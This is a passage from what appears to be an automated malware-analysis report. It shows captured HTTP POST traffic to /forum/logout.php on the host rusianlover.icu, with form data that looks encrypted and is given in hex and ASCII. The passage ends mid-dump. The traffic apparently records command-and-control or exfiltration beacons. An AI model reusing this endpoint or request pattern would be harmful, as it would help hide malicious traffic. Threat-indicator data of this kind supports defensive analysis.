38 62 62 38 37 65 31 37 36 36 35 35 37 39 65 33 61 36 35 35 37 64 61 65 30 61 37 36 37 34 33 34 39 36 64 33 64 63 31 61 61 34 65 30 36 38 62 36 34 39 63 32 64 65 62 30 61 30 37 66 34 62 63 39 36 36 65 36 35 32 32 65 61 32 38 35 30 32 33 36 38 38 34 30 65 35 31 62 34 34 34 33 66 65 32 65 38 35 63 32 65 31 32 37 34 62 64 39 39 36 64 31 64 34 66 38 30 65 61 33 30 65 30 32 30 64 39 65 62 35 32 38 39 33 31 34 30 30 62 62 35 66 39 36 66 31 Data Ascii: eoscgq=92799254&gsykqciu=29A5AF923EC3663DF9F4F1663390819F19ACF729DF132BB10AD04B28&iwes=d54f321b61a500da2401e804a6816a867ab9b7c7e7d6b3e4df01072d89d1b97ce1aba2d6630d382b5f088d483fbd444a8e440eadc483e2b6a1d6164e9499da4a3e3c0984d2edbcfb35bf5890a93e028a930ba369502523b7e65bfe28c3f5c60c2cd110ef494a37de91a36dd1ec6bfa2c245ecde7c0e8a2a5003b62467c5fec062bcb1c78ae8fd284faf9292f01db1ee80db6a8758eea3d48489c6495fb7910dfa399ac22a99c997b356384dc1590741d5bf88eb1c1bee522eeb506419cf8705153b7e1ddc86656f254a61ddd85e3889a597f3c1c4b15d73789919e8bb87e17665579e3a6557dae0a76743496d3dc1aa4e068b649c2deb0a07f4bc966e6522ea28502368840e51b4443fe2e85c2e1274bd996d1d4f80ea30e020d9eb528931400bb5f96f1
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?id=5263631 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 669Cache-Control: no-cacheData Raw: 6d 79 71 63 3d 30 65 61 31 64 65 61 62 37 63 65 34 62 66 32 39 31 35 31 65 33 63 35 37 64 33 34 61 34 66 65 66 33 30 39 31 34 34 35 38 30 62 30 64 35 64 63 31 38 62 37 34 61 31 26 6b 75 6b 75 6b 75 6b 75 3d 38 30 34 34 34 39 37 34 26 6f 63 77 6b 65 73 3d 42 33 46 38 39 35 35 39 32 41 44 34 30 31 43 31 41 44 38 38 45 45 34 42 45 36 30 46 31 30 30 46 45 43 35 46 36 30 34 30 38 41 31 31 36 44 45 33 45 32 31 44 46 37 36 39 45 34 43 37 41 36 33 43 41 36 44 38 39 44 39 35 30 42 32 33 30 39 37 41 45 44 36 34 38 34 42 34 39 38 43 45 45 46 45 31 36 35 34 37 32 37 39 30 36 42 43 34 37 31 31 32 44 37 46 43 35 46 31 30 45 33 45 37 41 45 45 39 32 34 33 42 33 42 35 43 34 42 41 45 39 39 39 37 34 41 44 43 31 31 36 34 33 32 30 42 43 39 41 35 38 45 31 44 45 37 37 38 39 41 36 36 46 46 32 32 45 32 31 31 31 45 31 39 39 46 42 32 42 33 41 30 30 36 39 32 31 35 43 43 31 43 34 33 43 31 30 46 32 32 46 43 43 37 32 36 43 33 39 30 43 33 44 36 35 41 46 36 46 37 32 46 44 33 42 31 35 37 33 42 39 35 34 39 30 44 30 37 43 37 30 35 44 46 45 38 42 30 38 44 45 46 46 32 44 31 43 39 31 39 45 42 31 44 33 44 34 34 43 46 38 38 31 31 45 31 42 31 39 32 32 33 35 43 41 45 37 38 37 35 44 46 33 42 41 34 35 34 30 35 43 43 46 46 39 33 32 33 38 44 30 38 37 36 36 30 41 37 46 44 34 30 45 38 44 43 36 41 33 31 44 33 39 31 32 43 44 42 46 37 32 38 46 45 30 45 44 43 37 38 37 46 41 34 39 33 46 38 38 31 46 34 39 39 33 41 31 46 31 44 35 34 44 42 36 35 33 36 36 46 43 44 36 32 42 33 38 34 35 32 32 39 36 36 45 34 30 33 37 31 44 43 42 31 44 34 35 35 42 37 33 46 46 34 36 39 36 43 35 36 39 37 45 46 32 39 36 34 44 44 33 42 36 43 36 32 45 30 39 41 36 31 42 37 34 31 33 30 44 43 30 41 35 45 45 44 38 45 41 34 33 33 33 33 38 39 33 37 34 37 32 34 44 44 32 32 34 33 31 36 30 39 42 41 44 39 34 42 30 30 46 44 41 33 33 38 36 36 41 35 45 46 41 35 43 39 45 38 35 33 35 44 34 34 32 31 35 33 42 42 36 31 46 36 34 31 46 36 44 46 32 44 38 31 38 42 44 31 31 41 33 44 43 43 45 31 41 34 34 42 32 39 39 37 35 30 41 45 45 36 39 46 41 36 41 39 31 34 32 30 39 39 32 41 Data Ascii: myqc=0ea1deab7ce4bf29151e3c57d34a4fef309144580b0d5dc18b74a1&kukukuku=80444974&ocwkes=B3F895592AD401C1AD88EE4BE60F100FEC5F60408A116DE3E21DF769E4C7A63CA6D89D950B23097AED6484B498CEEFE1654727906BC47112D7FC5F10E3E7AEE9243B3B5C4BAE99974ADC1164320BC9A58E1DE7789A66FF22E2111E199FB2B3A0069215CC1C43C10F22FCC726C390C3D65AF6F72FD3B1573B95490D07C705DFE8B08DEFF2D1C919EB1D3D44CF8811E1B192235CAE7875DF3BA45405CCFF93238D087660A7FD40E8DC6A31D3912CDBF728FE0EDC787FA493F881F4993A1F1D54DB65366FCD62B384522966E40371DCB1D455B73FF4696C5697EF2964DD3B6C62E09A61B74130DC0A5EED8EA4333389374724DD22431609BAD94B00FDA33866A5EFA5C9E8535D442153BB61F641F6DF2D818BD11A3DCCE1A44B299750AEE69FA6A91420992A
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?pid=438 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 665Cache-Control: no-cacheData Raw: 6b 75 65 6f 79 69 73 63 3d 45 38 31 41 32 38 46 39 43 45 31 38 46 34 31 32 37 42 39 43 39 41 45 34 39 42 36 44 32 37 35 45 33 35 35 36 41 39 32 45 35 41 38 35 43 42 41 42 43 33 26 69 71 79 67 6f 77 3d 37 36 37 38 32 32 34 32 26 6d 79 6b 77 3d 32 34 35 44 30 46 45 38 31 36 34 35 46 44 46 44 39 44 46 44 30 33 46 33 34 44 43 44 41 37 41 43 38 46 46 30 33 30 33 37 46 37 32 41 37 45 31 33 41 41 35 35 35 37 45 35 33 31 35 30 33 30 34 46 45 32 30 42 43 34 37 31 31 31 43 32 30 33 37 36 30 37 41 44 32 38 37 46 33 41 33 41 39 39 42 44 43 33 39 33 30 37 45 46 31 46 46 34 39 38 44 39 34 34 33 36 43 38 37 44 35 34 34 42 46 46 33 45 38 36 39 35 45 44 36 38 32 44 45 43 38 37 45 31 45 31 46 35 38 44 41 33 41 41 35 34 33 45 43 37 37 42 36 31 31 32 33 46 34 32 30 46 37 39 39 37 34 35 41 38 46 35 31 35 30 30 43 31 39 42 38 42 44 44 33 32 39 33 32 43 45 36 45 32 43 31 30 41 45 34 37 33 37 39 38 45 41 35 35 32 46 44 41 42 44 33 38 39 43 44 37 34 34 32 37 30 34 42 41 45 37 42 42 31 45 34 46 42 33 32 41 37 32 43 43 30 46 46 37 39 34 30 38 39 45 44 39 42 33 31 30 39 44 30 41 42 36 32 33 45 34 36 44 34 32 38 44 38 36 45 32 30 31 32 44 32 43 38 45 34 37 34 35 30 30 30 44 43 34 43 42 31 39 39 36 39 30 32 41 34 34 37 36 41 35 31 31 31 34 43 39 36 34 36 43 36 38 30 38 46 46 35 45 31 42 31 43 44 33 42 38 42 41 41 37 41 31 42 44 33 32 43 31 45 31 42 39 43 36 36 39 32 44 31 32 38 33 39 45 34 33 39 45 41 45 38 33 33 46 30 45 35 36 45 46 31 39 42 33 38 46 34 46 45 46 34 38 35 32 38 43 30 41 31 37 33 41 30 35 44 42 35 41 32 45 32 39 34 38 44 36 36 33 35 34 33 31 30 38 46 31 31 39 41 36 34 41 39 41 32 32 43 34 37 36 44 42 44 45 46 46 43 30 39 36 32 39 46 45 43 41 33 46 39 44 43 45 38 34 34 41 44 32 46 33 44 33 46 38 37 45 35 35 37 35 43 38 43 42 33 33 35 45 43 43 31 34 30 38 32 39 46 31 35 35 31 41 44 46 44 42 37 42 31 35 31 41 42 39 44 30 34 32 36 34 30 39 33 30 46 38 35 35 44 35 37 30 35 44 37 31 30 36 44 39 44 32 31 30 33 44 41 38 42 33 32 45 31 37 39 31 39 32 36 41 39 30 42 34 44 39 34 37 33 Data Ascii: kueoyisc=E81A28F9CE18F4127B9C9AE49B6D275E3556A92E5A85CBABC3&iqygow=76782242&mykw=245D0FE81645FDFD9DFD03F34DCDA7AC8FF03037F72A7E13AA5557E53150304FE20BC47111C2037607AD287F3A3A99BDC39307EF1FF498D94436C87D544BFF3E8695ED682DEC87E1E1F58DA3AA543EC77B61123F420F799745A8F51500C19B8BDD32932CE6E2C10AE473798EA552FDABD389CD7442704BAE7BB1E4FB32A72CC0FF794089ED9B3109D0AB623E46D428D86E2012D2C8E4745000DC4CB1996902A4476A51114C9646C6808FF5E1B1CD3B8BAA7A1BD32C1E1B9C6692D12839E439EAE833F0E56EF19B38F4FEF48528C0A173A05DB5A2E2948D663543108F119A64A9A22C476DBDEFFC09629FECA3F9DCE844AD2F3D3F87E5575C8CB335ECC140829F1551ADFDB7B151AB9D042640930F855D5705D7106D9D2103DA8B32E1791926A90B4D9473
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 667Cache-Control: no-cacheData Raw: 75 75 6f 6f 69 69 3d 35 38 44 34 43 39 33 36 39 34 32 38 37 46 34 30 46 32 46 30 46 37 44 46 35 39 41 43 30 41 33 41 41 41 41 46 36 45 38 41 35 33 44 45 37 32 34 41 41 31 42 37 26 73 71 69 67 3d 32 30 38 32 33 35 32 38 26 77 79 75 77 73 75 77 73 3d 36 61 61 37 37 33 64 37 39 62 38 66 61 31 64 34 62 38 64 66 31 35 63 34 63 31 38 63 32 66 30 38 63 36 31 65 36 38 32 39 66 37 33 35 62 63 65 63 34 39 38 34 32 63 36 36 35 66 37 35 36 65 64 31 32 64 32 31 38 35 65 61 65 31 64 32 36 62 66 34 34 62 39 32 61 32 32 38 63 33 37 34 31 65 66 39 36 32 31 66 37 65 63 66 65 61 34 31 64 35 35 32 39 32 32 31 63 37 37 32 37 34 61 61 30 31 34 39 38 36 65 39 39 30 61 36 36 30 39 32 61 32 36 34 31 61 65 65 62 65 39 38 31 39 37 34 39 35 38 31 38 32 30 33 36 33 66 30 66 39 38 37 66 36 62 61 64 38 66 39 37 36 38 39 39 61 36 38 62 35 63 30 34 34 31 39 31 61 36 36 31 35 63 34 62 36 35 39 63 37 33 61 36 39 66 33 35 34 38 36 38 30 30 35 62 37 36 31 38 39 31 39 38 66 64 61 34 33 32 34 36 63 62 63 63 65 39 39 39 37 62 34 38 32 66 64 35 37 37 30 34 31 31 66 38 64 62 33 61 34 33 63 61 66 38 37 66 32 63 30 63 32 31 64 33 66 61 66 66 38 65 65 32 31 62 62 65 33 62 38 39 34 32 36 64 37 31 61 64 30 62 31 35 63 32 61 39 37 31 33 37 39 35 63 38 37 31 34 65 39 34 63 33 36 32 39 38 64 66 36 66 66 33 64 34 35 64 32 34 32 35 35 38 31 39 34 35 61 30 38 33 66 37 62 38 36 34 37 39 65 65 30 33 31 38 61 35 66 30 63 38 30 39 61 30 36 62 38 31 63 66 37 65 32 63 66 37 62 61 38 39 39 64 64 65 63 31 35 34 61 38 37 33 62 66 62 64 62 63 39 64 37 66 63 36 36 63 31 34 32 36 63 64 33 39 33 31 36 62 34 39 38 39 37 33 64 32 34 37 33 32 35 63 31 33 36 65 39 31 36 39 38 31 63 39 31 63 39 30 33 65 37 61 39 62 64 30 36 31 32 62 33 36 30 36 35 36 32 31 65 65 33 36 31 39 39 65 33 34 39 65 61 61 34 35 31 65 37 63 39 66 39 65 34 62 62 39 35 38 62 30 39 36 30 61 36 61 61 35 32 39 32 36 30 63 32 31 64 65 64 66 32 66 61 61 35 31 39 38 39 64 35 30 65 38 65 37 35 66 33 38 36 63 36 62 30 39 65 30 65 38 31 36 32 38 61 37 32 33 33 64 64 30 65 Data Ascii: uuooii=58D4C93694287F40F2F0F7DF59AC0A3AAAAF6E8A53DE724AA1B7&sqig=20823528&wyuwsuws=6aa773d79b8fa1d4b8df15c4c18c2f08c61e6829f735bcec49842c665f756ed12d2185eae1d26bf44b92a228c3741ef9621f7ecfea41d5529221c77274aa014986e990a66092a2641aeebe9819749581820363f0f987f6bad8f976899a68b5c044191a6615c4b659c73a69f354868005b76189198fda43246cbcce9997b482fd5770411f8db3a43caf87f2c0c21d3faff8ee21bbe3b89426d71ad0b15c2a9713795c8714e94c36298df6ff3d45d2425581945a083f7b86479ee0318a5f0c809a06b81cf7e2cf7ba899ddec154a873bfbdbc9d7fc66c1426cd39316b498973d247325c136e916981c91c903e7a9bd0612b36065621ee36199e349eaa451e7c9f9e4bb958b0960a6aa529260c21dedf2faa51989d50e8e75f386c6b09e0e81628a7233dd0e
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?pid=925 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 663Cache-Control: no-cacheData Raw: 61 67 6d 6d 73 79 79 65 3d 41 31 43 32 45 35 46 34 39 33 38 32 42 32 45 33 36 32 35 37 35 32 39 41 30 34 36 39 39 43 36 36 33 35 45 33 42 41 46 41 44 41 41 32 33 45 38 41 26 79 63 67 65 69 6d 3d 38 38 35 33 34 31 30 36 26 63 6b 73 75 3d 63 35 38 62 66 38 31 66 61 36 33 36 38 35 66 37 62 61 38 38 64 34 34 35 33 34 31 34 65 62 30 35 34 31 36 39 65 66 61 66 65 36 63 30 62 31 37 32 65 61 62 63 35 33 65 37 39 65 64 62 63 62 34 31 61 38 64 30 34 30 30 62 32 62 31 38 32 38 39 34 32 63 61 31 34 32 64 66 61 38 65 34 36 61 62 30 63 30 32 37 30 63 38 63 63 34 36 62 66 30 31 33 63 63 35 39 36 39 37 64 62 32 30 62 39 65 64 35 31 30 33 33 35 33 38 61 36 38 66 37 66 34 31 38 62 34 38 31 33 32 36 35 64 33 30 32 63 33 32 34 33 33 63 31 63 35 62 33 35 66 36 39 39 34 36 33 39 36 38 38 66 62 37 36 66 64 34 63 31 38 63 39 38 36 63 61 31 37 61 32 30 38 39 32 34 31 34 66 35 37 37 31 63 61 64 62 38 37 63 37 34 39 35 64 37 65 36 32 65 34 62 32 34 64 63 65 37 33 34 64 62 61 33 33 30 30 36 62 65 34 61 64 30 39 30 64 32 38 35 35 38 62 63 63 32 65 35 31 32 38 31 32 35 32 35 64 63 66 34 38 33 31 37 39 32 61 33 62 62 32 63 62 33 39 35 34 62 35 35 37 38 64 32 61 35 38 30 66 31 65 39 63 62 39 33 38 38 64 31 33 39 32 38 33 63 33 33 33 66 39 36 30 62 33 39 37 31 65 64 35 39 33 30 38 61 66 64 61 62 34 30 39 32 30 31 61 34 62 30 39 34 38 33 64 31 64 31 31 30 38 65 61 30 33 36 35 34 65 62 65 30 35 39 65 37 32 62 32 37 30 38 33 30 39 61 62 32 32 38 35 64 33 38 39 39 38 64 66 36 63 31 38 66 37 39 32 36 35 34 31 65 39 64 61 61 66 65 30 33 31 34 35 30 30 66 64 62 32 36 65 62 36 32 34 62 65 30 31 30 32 65 32 64 61 38 66 37 37 62 31 33 39 37 30 32 36 30 36 36 32 64 61 62 36 37 30 63 34 35 31 33 39 62 36 31 65 34 30 65 39 66 64 34 30 30 36 62 38 38 34 39 39 39 61 63 64 39 36 66 35 66 38 61 31 65 63 39 65 65 38 33 33 33 65 37 62 35 31 66 32 33 61 30 63 65 32 31 35 38 35 63 32 65 66 62 37 37 64 65 66 34 38 65 30 31 33 64 61 65 37 35 33 37 37 63 32 33 62 62 63 38 37 31 35 32 64 66 38 64 30 35 38 30 38 Data Ascii: agmmsyye=A1C2E5F49382B2E36257529A04699C6635E3BAFADAA23E8A&ycgeim=88534106&cksu=c58bf81fa63685f7ba88d4453414eb054169efafe6c0b172eabc53e79edbcb41a8d0400b2b1828942ca142dfa8e46ab0c0270c8cc46bf013cc59697db20b9ed51033538a68f7f418b4813265d302c32433c1c5b35f6994639688fb76fd4c18c986ca17a20892414f5771cadb87c7495d7e62e4b24dce734dba33006be4ad090d28558bcc2e512812525dcf4831792a3bb2cb3954b5578d2a580f1e9cb9388d139283c333f960b3971ed59308afdab409201a4b09483d1d1108ea03654ebe059e72b2708309ab2285d38998df6c18f7926541e9daafe0314500fdb26eb624be0102e2da8f77b13970260662dab670c45139b61e40e9fd4006b884999acd96f5f8a1ec9ee8333e7b51f23a0ce21585c2efb77def48e013dae75377c23bbc87152df8d05808
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 648Cache-Control: no-cacheData Raw: 74 73 72 6b 6a 69 68 61 7a 3d 31 36 35 34 36 33 36 31 26 76 77 78 73 74 3d 45 31 34 35 35 41 32 33 39 37 37 42 37 38 35 41 31 35 41 35 36 44 37 44 35 35 41 34 33 46 26 78 61 64 61 64 67 6a 3d 41 30 42 45 35 34 36 46 31 33 46 43 45 46 46 37 39 38 38 30 38 46 44 37 37 43 35 33 45 34 37 37 30 30 46 42 32 30 43 36 32 34 39 37 35 31 32 31 32 33 34 33 39 33 32 34 39 31 39 39 30 43 41 43 31 44 33 36 42 45 36 39 37 38 35 42 32 36 44 33 41 34 36 41 43 41 31 30 44 36 31 42 37 35 32 44 41 34 45 33 38 37 34 43 46 34 39 33 35 45 32 39 41 31 37 33 30 42 41 31 33 39 37 33 38 41 33 33 43 31 38 30 41 36 34 37 45 39 31 42 33 39 37 38 30 38 39 41 41 44 46 43 42 38 35 35 42 39 41 36 46 37 37 39 35 42 30 37 39 45 36 45 33 38 37 38 38 36 37 43 31 45 30 33 44 30 32 45 30 39 39 35 44 38 44 36 36 35 33 33 36 45 33 41 43 38 36 35 35 43 36 36 44 46 38 43 45 42 41 34 45 33 41 36 35 39 30 44 43 34 42 43 34 36 39 43 36 31 45 37 30 42 42 36 44 42 42 33 43 31 30 41 34 31 46 44 39 31 46 45 34 31 37 45 46 39 41 41 35 46 39 33 30 31 33 39 34 44 32 45 39 46 44 34 43 41 45 34 32 32 39 32 30 32 39 44 38 41 33 45 31 33 33 32 45 36 37 39 46 38 43 45 38 45 36 39 35 30 46 31 31 41 30 33 37 31 38 42 38 37 44 33 38 46 45 41 42 46 46 34 35 43 39 44 37 30 36 30 32 31 33 33 39 44 41 31 44 41 34 34 44 33 31 34 42 43 39 46 41 33 44 35 41 46 39 33 39 42 37 41 30 30 30 42 34 39 39 31 38 34 43 35 33 30 31 31 37 46 31 31 45 33 43 35 44 33 41 46 38 38 37 35 35 31 41 42 41 45 46 33 42 33 39 31 46 32 41 34 36 34 36 42 42 46 32 35 46 30 30 42 31 36 42 32 44 36 35 34 34 45 31 30 33 33 31 30 32 41 35 46 38 45 38 42 45 35 38 35 41 44 39 30 34 30 43 41 33 46 46 33 37 41 41 39 41 33 32 34 38 31 41 34 30 41 36 46 34 34 45 34 39 46 31 33 39 37 46 39 43 32 45 39 33 30 34 30 45 33 45 33 34 30 39 41 38 42 41 44 46 39 38 32 46 34 45 41 41 36 30 32 35 41 46 39 46 36 34 36 38 38 45 34 38 35 44 42 45 37 37 43 42 46 46 44 30 31 35 43 43 34 35 32 33 35 44 43 44 35 38 33 30 38 34 34 Data Ascii: tsrkjihaz=16546361&vwxst=E1455A23977B785A15A56D7D55A43F&xadadgj=A0BE546F13FCEFF798808FD77C53E47700FB20C6249751212343932491990CAC1D36BE69785B26D3A46ACA10D61B752DA4E3874CF4935E29A1730BA139738A33C180A647E91B3978089AADFCB855B9A6F7795B079E6E3878867C1E03D02E0995D8D665336E3AC8655C66DF8CEBA4E3A6590DC4BC469C61E70BB6DBB3C10A41FD91FE417EF9AA5F9301394D2E9FD4CAE42292029D8A3E1332E679F8CE8E6950F11A03718B87D38FEABFF45C9D706021339DA1DA44D314BC9FA3D5AF939B7A000B499184C530117F11E3C5D3AF887551ABAEF3B391F2A4646BBF25F00B16B2D6544E1033102A5F8E8BE585AD9040CA3FF37AA9A32481A40A6F44E49F1397F9C2E93040E3E3409A8BADF982F4EAA6025AF9F64688E485DBE77CBFFD015CC45235DCD5830844
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 644Cache-Control: no-cacheData Raw: 7a 79 64 63 68 67 66 3d 36 65 64 38 64 39 33 32 37 37 36 30 35 30 32 61 31 31 61 31 33 31 35 61 32 63 26 78 75 78 75 78 3d 34 30 36 35 38 35 34 35 26 62 63 6a 6b 72 73 74 61 62 3d 33 46 36 37 44 37 43 43 38 35 36 36 39 35 42 39 41 32 42 44 31 32 30 44 34 44 31 37 46 38 39 32 30 42 36 30 36 43 34 38 43 32 34 34 46 33 30 36 34 43 31 35 35 38 39 36 39 31 41 42 36 34 31 38 45 37 32 32 41 35 30 33 41 37 34 45 35 30 43 35 44 34 30 43 44 36 34 36 46 33 32 32 36 32 35 34 38 37 32 46 36 33 35 34 32 30 37 41 31 30 42 42 35 46 33 33 44 33 39 45 44 36 42 46 35 43 41 45 33 39 42 32 39 31 35 41 34 37 34 36 38 33 42 36 44 38 42 39 32 35 30 35 39 30 33 30 37 37 42 43 42 31 39 38 44 45 32 46 39 44 41 38 45 32 43 44 42 35 39 31 44 30 33 38 31 44 30 38 36 38 33 41 44 33 41 42 33 46 46 30 30 39 37 31 33 46 35 46 31 36 44 42 44 45 44 37 33 39 46 39 43 30 30 38 30 31 45 39 30 44 34 42 34 33 42 39 43 41 45 42 45 44 43 32 42 31 41 35 33 42 31 34 34 46 42 44 43 43 37 31 33 46 32 30 38 37 34 41 33 46 35 36 42 33 30 43 37 35 34 30 39 39 44 39 36 39 32 46 45 39 35 44 32 37 37 31 30 41 39 35 38 42 41 42 42 37 36 34 44 32 39 45 37 43 46 43 44 32 39 37 35 33 32 33 36 44 31 42 35 30 45 34 44 31 42 34 38 33 45 35 46 30 45 36 36 37 35 37 34 32 30 32 44 31 32 34 38 46 32 35 46 43 34 30 38 39 33 37 33 41 32 37 35 30 30 32 41 32 44 35 42 37 44 32 36 31 38 45 43 43 45 34 44 36 35 41 46 31 38 42 30 41 44 31 39 43 32 35 46 39 45 33 30 31 32 43 46 46 42 30 30 44 31 38 34 38 30 36 46 41 41 34 34 41 30 32 37 44 46 45 44 44 32 38 31 33 35 31 46 35 41 31 38 43 33 37 38 39 39 35 32 34 36 31 35 43 31 36 37 43 32 43 44 31 43 33 33 33 43 38 39 31 39 46 30 35 30 43 36 44 45 38 44 34 41 46 34 30 35 41 33 41 45 35 45 42 41 44 31 39 31 35 43 44 35 45 45 44 30 42 35 41 46 46 44 36 41 34 33 36 38 37 36 32 35 30 38 46 33 31 45 34 46 43 30 43 46 36 42 38 41 30 38 32 38 33 34 36 44 44 39 46 34 33 34 43 30 36 41 33 39 32 33 37 44 35 43 35 45 31 46 45 31 34 Data Ascii: zydchgf=6ed8d9327760502a11a1315a2c&xuxux=40658545&bcjkrstab=3F67D7CC856695B9A2BD120D4D17F8920B606C48C244F3064C15589691AB6418E722A503A74E50C5D40CD646F3226254872F6354207A10BB5F33D39ED6BF5CAE39B2915A474683B6D8B92505903077BCB198DE2F9DA8E2CDB591D0381D08683AD3AB3FF009713F5F16DBDED739F9C00801E90D4B43B9CAEBEDC2B1A53B144FBDCC713F20874A3F56B30C754099D9692FE95D27710A958BABB764D29E7CFCD29753236D1B50E4D1B483E5F0E667574202D1248F25FC4089373A275002A2D5B7D2618ECCE4D65AF18B0AD19C25F9E3012CFFB00D184806FAA44A027DFEDD281351F5A18C37899524615C167C2CD1C333C8919F050C6DE8D4AF405A3AE5EBAD1915CD5EED0B5AFFD6A4368762508F31E4FC0CF6B8A0828346DD9F434C06A39237D5C5E1FE14
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?id=9557666 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 672Cache-Control: no-cacheData Raw: 66 71 62 67 72 3d 41 30 44 36 39 39 38 35 42 44 30 44 39 45 36 44 32 32 43 45 32 43 35 42 46 39 34 42 46 46 41 31 45 36 36 37 46 33 37 46 34 44 37 37 34 41 38 46 38 36 44 35 43 46 26 64 6d 76 79 68 71 7a 63 6c 3d 32 30 30 30 32 34 37 35 26 68 75 68 6f 62 6f 62 3d 62 62 65 37 65 39 66 65 35 38 39 31 30 35 33 30 32 62 34 63 31 39 38 33 33 37 64 37 65 30 64 31 37 63 34 38 39 31 62 34 37 64 61 30 32 38 37 61 30 35 35 38 30 39 35 65 30 38 64 62 65 36 32 36 65 66 31 35 33 37 39 62 39 35 36 30 62 38 32 37 34 30 65 38 39 33 66 31 66 35 66 63 61 39 65 30 64 34 65 64 30 63 62 33 33 31 61 61 62 61 38 37 66 31 63 65 66 35 34 34 64 66 64 32 61 31 62 35 39 61 36 39 63 62 66 61 35 38 39 32 31 33 61 31 31 63 36 31 39 38 36 65 39 34 31 34 32 31 35 33 63 63 39 39 66 63 61 35 64 62 34 34 61 66 34 38 61 65 66 37 65 30 65 30 36 65 34 34 34 37 61 33 33 31 61 37 62 32 30 33 61 38 62 32 33 61 66 35 37 61 35 62 38 38 34 31 62 32 64 63 62 38 37 31 64 37 37 64 65 61 33 61 65 39 34 34 65 66 66 65 39 64 33 32 39 31 32 32 35 63 32 34 39 32 38 35 61 61 33 31 66 62 35 39 66 39 63 39 36 33 36 37 36 37 39 36 33 37 64 65 34 62 39 66 66 30 63 62 34 37 35 66 33 62 35 64 37 36 65 37 61 35 66 31 34 35 64 36 31 30 64 61 61 63 61 35 38 63 37 32 31 36 32 32 33 61 34 64 35 35 64 36 61 36 36 32 38 38 63 34 35 31 61 61 39 37 39 62 37 65 36 61 36 32 36 35 34 39 64 64 31 65 63 62 37 32 34 65 36 62 66 33 66 31 63 31 32 61 38 62 38 34 64 32 66 32 39 62 31 32 31 35 35 61 30 62 38 33 31 32 37 32 31 63 61 61 39 35 37 36 30 66 36 61 32 33 32 61 32 32 30 32 33 37 36 62 63 37 63 65 33 64 66 63 61 63 32 33 64 64 62 35 35 31 62 33 66 33 34 31 64 30 30 66 33 30 65 66 66 65 39 62 36 36 61 35 61 66 31 33 38 35 37 64 65 33 62 37 39 61 37 37 34 30 32 63 34 38 66 35 65 63 35 61 31 61 31 30 31 63 37 32 39 63 61 63 39 30 61 33 34 36 38 30 34 39 63 61 64 39 35 65 38 35 38 37 35 32 33 32 65 64 34 35 34 35 33 32 65 32 31 30 36 33 65 31 66 64 34 32 33 63 66 33 36 32 39 33 35 39 64 30 65 38 65 65 37 32 66 35 31 32 38 62 65 37 34 61 63 33 62 39 35 35 Data Ascii: fqbgr=A0D69985BD0D9E6D22CE2C5BF94BFFA1E667F37F4D774A8F86D5CF&dmvyhqzcl=20002475&huhobob=bbe7e9fe589105302b4c198337d7e0d17c4891b47da0287a0558095e08dbe626ef15379b9560b82740e893f1f5fca9e0d4ed0cb331aaba87f1cef544dfd2a1b59a69cbfa589213a11c61986e94142153cc99fca5db44af48aef7e0e06e4447a331a7b203a8b23af57a5b8841b2dcb871d77dea3ae944effe9d3291225c249285aa31fb59f9c96367679637de4b9ff0cb475f3b5d76e7a5f145d610daaca58c7216223a4d55d6a66288c451aa979b7e6a626549dd1ecb724e6bf3f1c12a8b84d2f29b12155a0b8312721caa95760f6a232a2202376bc7ce3dfcac23ddb551b3f341d00f30effe9b66a5af13857de3b79a77402c48f5ec5a1a101c729cac90a3468049cad95e85875232ed454532e21063e1fd423cf3629359d0e8ee72f5128be74ac3b955
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?id=2442663 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 659Cache-Control: no-cacheData Raw: 6d 79 6b 77 69 75 67 73 3d 37 34 38 34 37 38 36 36 38 64 34 35 66 66 39 37 38 38 38 38 66 61 61 30 38 34 34 62 63 34 39 65 34 34 62 38 63 38 30 35 64 39 32 63 26 6b 75 65 6f 79 69 3d 31 35 32 36 34 30 36 32 26 6f 63 71 65 3d 33 64 36 34 36 38 34 62 35 66 65 34 66 66 65 65 31 64 61 61 62 36 63 33 63 36 66 39 37 35 65 37 32 61 36 32 31 39 36 34 39 63 34 35 66 33 61 39 39 34 32 63 37 39 34 64 32 32 63 63 35 36 65 33 36 66 61 34 33 61 65 33 32 63 37 36 39 61 32 31 37 39 63 35 33 37 61 31 39 63 63 36 38 62 34 33 64 31 64 38 30 64 63 34 38 33 33 61 65 33 62 32 31 39 39 30 34 39 66 39 31 62 38 66 38 35 65 35 62 35 39 30 34 31 31 63 39 31 62 63 61 62 39 64 38 34 30 63 37 31 34 36 37 66 35 65 66 31 30 39 38 33 39 30 31 33 35 61 63 62 36 31 66 37 31 66 61 36 39 32 62 62 36 37 63 38 62 62 66 33 63 63 37 32 63 37 65 38 37 66 61 64 39 64 36 35 65 34 35 39 36 66 62 63 37 62 38 64 38 37 32 63 66 38 30 63 66 